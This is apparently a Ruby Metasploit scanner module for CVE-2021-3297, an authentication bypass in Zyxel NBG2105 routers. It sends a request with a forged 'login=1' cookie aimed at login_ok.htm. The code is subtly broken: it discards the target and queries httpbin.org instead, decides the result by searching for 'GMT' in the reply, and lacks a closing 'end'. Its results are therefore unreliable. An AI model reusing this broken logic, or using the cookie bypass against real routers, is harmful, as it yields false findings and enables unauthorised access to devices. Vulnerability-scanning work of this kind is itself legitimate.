# Zyxel NBG2105 身份验证绕过 CVE-2021-3297

require 'uri'
require 'net/http'

class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::HttpClient
   
    def initialize
      super(
        'Name'           => 'CVE_2021_3297_PoC',
        'Description'    => 'This module is used to scan the target site for CVE_2021_3297.',
        'Author'         => 'H.Mount',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies','RPORT')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST.Need not to set', '192.168.1.1']),
          OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
        ]) 
    
    end 
    
    def run_host(ip)
  
      uri = datastore['TARGETURI'] + '/login_ok.htm'  


      begin
        uri = URI("http://httpbin.org/get")
        req = Net::HTTP::Get.new(uri)
        req['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
        req['cookie'] = "login=1"

        res = Net::HTTP.start(uri.hostname, uri.port) {|http|
            http.request(req)
        }
        

        if res.body["GMT"] 
            print_warning("The CVE_2021_3297 vulnerability seems to exist at the target site!")
        else
            print_good("The CVE_2021_3297 vulnerability was not detected at the target site.")
        end
    
      rescue => ex
        if ex.message['404']
          print_good('The CVE_2021_3297 vulnerability was not detected at the target site.')
        else
          print_error('Some errors occurred...')
          print_error(ex.message)
        end
      end
  end